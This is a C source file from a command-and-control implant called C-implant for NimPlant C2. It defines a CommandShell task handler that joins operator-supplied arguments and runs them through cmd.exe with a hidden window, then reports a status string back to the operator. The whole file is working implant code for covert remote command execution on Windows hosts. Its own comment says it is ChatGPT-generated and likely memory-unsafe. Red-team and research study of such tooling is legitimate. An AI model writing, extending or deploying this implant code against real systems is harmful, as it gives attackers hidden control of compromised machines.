/**
 * GNU General Public License, version 2.0.
 *
 * Copyright (c) 2025 Tijme Gommers (@tijme).
 *
 * This source code file is part of C-implant for NimPlant C2. 
 * Licensed under GNU General Public License, version 2.0, and 
 * you are free to use, modify, and distribute this file under 
 * its terms. However, any modified versions of this file must 
 * include this same license and copyright notice.
 */

/**
 * Standard Input Output.
 * 
 * Defines three variable types, several macros, and various functions for performing input and output.
 * https://www.tutorialspoint.com/c_standard_library/stdio_h.htm
 */
#include <stdio.h>

/**
 * Standard Library.
 * 
 * Defines four variable types, several macros, and various functions for performing general functions.
 * https://www.tutorialspoint.com/c_standard_library/stdlib_h.htm
 */
#include <stdlib.h>

/**
 * Windows API.
 * 
 * Contains declarations for all of the functions, macro's & data types in the Windows API.
 * https://docs.microsoft.com/en-us/previous-versions//aa383749(v=vs.85)?redirectedfrom=MSDN
 */
#include <windows.h>

/**
 * Booleans.
 * 
 * Defines boolean types.
 * https://pubs.opengroup.org/onlinepubs/007904975/basedefs/stdbool.h.html
 */
#include <stdbool.h>

/**
 * Execute a shell command.
 * 
 * @note This function was generated by ChatGPT and thus likely not (memory) safe.
 *
 * @param struct Relocatable* context A struct with all loaded modules & functions.
 * @param struct NimPlantConfig* config A struct with all settings for the current beacon.
 * @param struct NimPlantClient* client A struct with runtime client settings (such as encryption key).
 * @param struct NimPlantTask* lpTask The task that has to be performed and in which the result can be saved.
 * @returns bool Positive if successfully executed.
 */
bool CommandShell(struct Relocatable* context, struct NimPlantConfig* config, struct NimPlantClient* client, struct NimPlantTask* lpTask) {
    BOOL bResultStatus = false;
    HINSTANCE hExecResult;
    char* lpArguments = NULL;
    
    // There must be at least one argument: the command
    if (lpTask->argumentsCount < 1) goto INVALID_ARGUMENT_AND_RETURN;

    // Prepare arguments if any
    size_t totalArgLen = 0;
    for (int i = 0; i < lpTask->argumentsCount; i++) {
        totalArgLen += context->functions.strlen(lpTask->arguments[i]) + 1; // +1 for space or null terminator
    }

    DEFINE_STRING(SlashC, "/c ");
    lpArguments = context->functions.calloc(totalArgLen + 3, sizeof(char));
    if (lpArguments == NULL) goto FAILURE_AND_RETURN;
    context->functions.strcat(lpArguments, SlashC);

    for (int i = 0; i < lpTask->argumentsCount; i++) {
        context->functions.strcat(lpArguments, lpTask->arguments[i]);
        if (i < lpTask->argumentsCount - 1) {
            DEFINE_STRING(lpSpace, " ");
            context->functions.strcat(lpArguments, lpSpace);
        }
    }

    // Execute the command using ShellExecuteA
    DEFINE_STRING(lpOpen, "open");
    DEFINE_STRING(lpCmd, "c:\\windows\\system32\\cmd.exe");
    hExecResult = context->functions.ShellExecuteA(NULL, lpOpen, lpCmd, lpArguments, NULL, SW_HIDE);
    if ((INT_PTR) hExecResult <= 32) goto EXECUTION_FAILED_AND_RETURN;

    // Store success message
    DEFINE_STRING(lpSuccessMessage, "[command executed successfully]");
    lpTask->result = context->functions.calloc(context->functions.strlen(lpSuccessMessage) + 1, sizeof(char));
    if (lpTask->result == NULL) goto FAILURE_AND_RETURN;
    context->functions.strcpy(lpTask->result, lpSuccessMessage);

    bResultStatus = true;
    goto CLEANUP_AND_RETURN;

INVALID_ARGUMENT_AND_RETURN:
    DEFINE_STRING(lpInvalidArgument, "[invalid argument]");
    lpTask->result = context->functions.calloc(context->functions.strlen(lpInvalidArgument) + 1, sizeof(char));
    if (lpTask->result == NULL) goto FAILURE_AND_RETURN;
    context->functions.strcpy(lpTask->result, lpInvalidArgument);
    bResultStatus = true;
    goto CLEANUP_AND_RETURN;

EXECUTION_FAILED_AND_RETURN:
    DEFINE_STRING(lpExecutionFailed, "[command execution failed]");
    lpTask->result = context->functions.calloc(context->functions.strlen(lpExecutionFailed) + 1, sizeof(char));
    if (lpTask->result == NULL) goto FAILURE_AND_RETURN;
    context->functions.strcpy(lpTask->result, lpExecutionFailed);
    bResultStatus = true;
    goto CLEANUP_AND_RETURN;

FAILURE_AND_RETURN:
    if (lpTask->result != NULL) context->functions.free(lpTask->result);
    if (lpArguments != NULL) context->functions.free(lpArguments);
    goto CLEANUP_AND_RETURN;

CLEANUP_AND_RETURN:
    goto RETURN;

RETURN:
    return bResultStatus;
}
